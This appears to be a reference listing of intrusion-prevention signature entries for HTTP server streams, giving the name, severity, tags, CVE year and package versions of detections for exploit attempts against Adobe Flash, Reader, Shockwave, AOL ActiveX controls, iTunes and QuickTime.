Vulnerability: HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Flash-Embedded-In-OLE-Document-Download

About this situation: Detected a download of Adobe Flash content embedded in OLE Structured Storage document
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-388-4219
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

HTTP_SS-Adobe-Flash-Embedded-In-PDF-Download

About this situation: Detected a download of Adobe Flash content embedded in PDF
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-311-4219
Last changed: sgpkg-ips-315-4219
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

HTTP_SS-Adobe-Flash-Exploit-CVE-2010-3643

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Adobe-Flash-CVE-2010-3654-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-400-4219
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609-2

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0611

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-400-4219
Last changed: sgpkg-ips-400-4219
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0611
Description:
Back to top

HTTP_SS-Adobe-Flash-Media-Download

About this situation: Detected a download of Adobe Flash content
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-311-4219
Vulnerability: Adobe-Flash-Media-Content
File-Type-Identification
Description:
Back to top

HTTP_SS-Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player (for Linux) detected
Context: HTTP Server Stream
Severity: 7
Tags: Linux, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2008, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
Description:
Back to top

HTTP_SS-Adobe-Flash-Player-Function-Variables-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player Detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Adobe-Flash-Player-Function-Variables-Information-Disclosure
Description:
Back to top

HTTP_SS-Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Flash Professional, Adobe Systems AIR, Adobe Systems Flex, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
Description:
Back to top

HTTP_SS-Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
Description:
Back to top

HTTP_SS-Adobe-Flash-Player-SWF-File-Code-Execution

About this situation: Detected an attempt to exploit a vulnerability in Adobe Flash Player
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-251-3038
Vulnerability: Adobe-Flash-Player-SWF-File-Code-Execution
Description:
Back to top

HTTP_SS-Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Illustrator CS3 detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Illustrator, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-381-4219
Vulnerability: Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, Adobe After Effects, Adobe Photoshop Album Starter, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-361-4219
Last changed: sgpkg-ips-361-4219
Vulnerability: Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438a
Adobe-Reader-BMP-Vulnerability-2011-4372
Description:
Back to top

HTTP_SS-Adobe-Reader-BMP-Vulnerability-2011-2438c

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438c
Description:
Back to top

HTTP_SS-Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Reader-Integer-Overflow-CVE-2010-2862

About this situation: A malicious PDF document targeting CVE-2010-2862 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: Adobe-Reader-Integer-Overflow-CVE-2010-2862
Description:
Back to top

HTTP_SS-Adobe-Reader-JavaScript-Vulnerability-2011-2442

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Adobe-Reader-JavaScript-Vulnerability-2011-2442
Description:
Back to top

HTTP_SS-Adobe-Reader-JPEG-Multiple-App0-Markers

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-JPEG-Multiple-App0-Markers
Description:
Back to top

HTTP_SS-Adobe-Reader-Pcx-Height-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-Pcx-Height-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Reader-Printseps-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-375-4219
Vulnerability: Adobe-Reader-Printseps-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Shockwave Director detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Shockwave Director, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Adobe Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-306-4219
Vulnerability: Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Shockwave-Player-rcsL-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Adobe-Shockwave-Player-rcsL-Corruption
Description:
Back to top

HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Shockwave Player detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Systems Shockwave Player, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
Adobe-ShockwavePlayer-DirectorFile-RecordParsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Altnet Download Manager ADM4 ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Kazaa, Grokster, Altnet Download Manager, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called

About this situation: Detects function calls to the DownloadAgent method of the AOL ICQ ICQPhone.SipxPhoneManager ActiveX control
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, AOL Instant Messenger, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Code-Execution
Description:
Back to top

HTTP_SS-AOL-Instant-Messenger-Away-Message-Buffer-Overflow

About this situation: Detected an attempt to exploit buffer overflow vulnerability in AOL Instant Messenger
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AOL Instant Messenger, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: AOL-Instant-Messenger-Away-Message-Buffer-Overflow
Description:
Back to top

HTTP_SS-AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in AOL Phobox.Playlist ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AOL, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
Description:
Back to top

HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in AOL Radio detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AOL Radio, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in AOL Radio AmpX ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AOL Radio, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

HTTP_SS-AOL-SuperBuddy-ActiveX-Control-Function-Deference

About this situation: Attempt to exploit a vulnerability in AOL SuperBuddy ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AOL, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: AOL-SuperBuddy-ActiveX-Control-Function-Deference
Description:
Back to top

HTTP_SS-Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Apple-iTunes-Playlist-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-296-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-365-4219
Vulnerability: Apple-iTunes-Playlist-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Apple iTunes detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-227-3038
Last changed: sgpkg-ips-227-3038
Vulnerability: Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-And-iTunes-Heap-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer, Inc QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, Apple iTunes, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-355-4219
Vulnerability: Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
Description:
Back to top

HTTP_SS-Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Apple QuickTime, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-300-4219
Vulnerability: Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple QuickTime, CVE2009, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
Description:
Back to top

HTTP_SS-Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-402-4219
Vulnerability: Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
Description:
Back to top

HTTP_SS-Apple-QuickTime-Media-Download

About this situation: Detected a download of Apple QuickTime media file
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Apple QuickTime, Any Operating System not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Apple-QuickTime-Media-Content
File-Type-Identification
Description:
Back to top

HTTP_SS-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: HTTP-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer

About this situation: An attempt to exploit a vulnerability in Apple QuickTime ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Apple QuickTime, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
Description:
Back to top

